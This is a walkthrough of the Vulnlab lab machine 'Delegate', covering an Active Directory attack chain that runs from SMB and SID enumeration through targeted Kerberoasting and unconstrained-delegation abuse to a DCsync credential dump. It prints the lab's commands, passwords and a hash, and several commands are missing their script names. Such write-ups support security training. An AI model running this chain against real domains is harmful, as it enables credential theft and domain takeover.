Vulnlab — Delegate

5 min readOct 29, 2023

Delegate is a medium rated machine which consisted of enumerating smb shares to find credentials of a user which had GenericWrite over a user object which was abused through Targeted Kerberoasting, having SeEnableDelegation privilege this lead to Unconstrained Delegation and then performing DCsync.

53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open tcpwrapped
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Issuer: commonName=DC1.delegate.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-30T15:47:02
| Not valid after: 2024-03-31T15:47:02
| MD5: 3a340b861cd985281f509d995bef9f4a
|_SHA-1: ccc740dd30a643bfc26e0b7f5d018da28d7e1630
5985/tcp open

Enumerating smb with anonymous user doesn’t show any interesting shares

We can however enumerate domain users with lookupsid using a guest account by brute forcing SIDs guest@delegate.vl 10000

Having the domain users, we can check if there’s any account having pre-authentication disabled which can lead to AS-REP roasting

Going back to shares and accessing SYSVOL , we can find users.bat file having a password

Spraying this password on the users we have confirms that this password belongs A.Briggs

Running python-bloodhound to enumerate the domain

python3 -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123' -c all -ns

From bloodhound we can see A.Briggs has GenericWrite on N.thompson

This can abuse either through Shadow credentials or associating a SPN to N.Thompson for Targeted kerberoasting, I tried to add shadow credentials by editing msDS-KeyCredentialLink but due to PKINT not being supported by DC it didn't worked

Attempting to perform targeted kerberoasting

python3 /opt/targetedKerberoast/ -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'

Cracking the hash with hashcat

Since N.Thompson has CanPSRemote we can login through WinRM

This user belongs to Delegation Admins but there wasn't ACLs on bloodhound for that group

Checking privileges of this user shows that it has SeEnableDelegationPrivilege enabled

This means that we can abuse unconstrained delegation by creating machine account and append a SPN to it, before that we need to make sure if machine quota isn’t 0

First creating a machine account with -dc-ip -computer-pass TestPassword321 -computer-name UwU delegate.vl/N.Thompson:'KALEB_2341'

Adding DNS record for the machine account we created

python3 -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d --action add DC1.delegate.vl -dns-ip

To abuse unconstrained delegation the machine account needs to have a SPN and TRUSTED_FOR_DELEGATION UAC, using bloodyAD we can add the UAC

python3 /opt/bloodyAD/ -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION

Appending SPN with addspn via msDS-AdditionalDnsHostName

python3 ./ -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip DC1.delegate.vl --additional

python3 ./ -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip DC1.delegate.v

Now running krbrelayx first by coercing authentication (using any poc i.e petipotam, printerbug, dfscoerce ) from DC1 to our added machine with unconstrained delegation enabled, this will grab the copy of DC1’s TGT which gets stored in the memory of machine account h for the purpose of accessing resources which can be abused to perform DCsync

python3 -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl
python3 ./ -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC

Having the ticket, we can export it and perform dcsync hashes with secretsdump 'DC1$'@DC1.delegate.vl -k -no-pass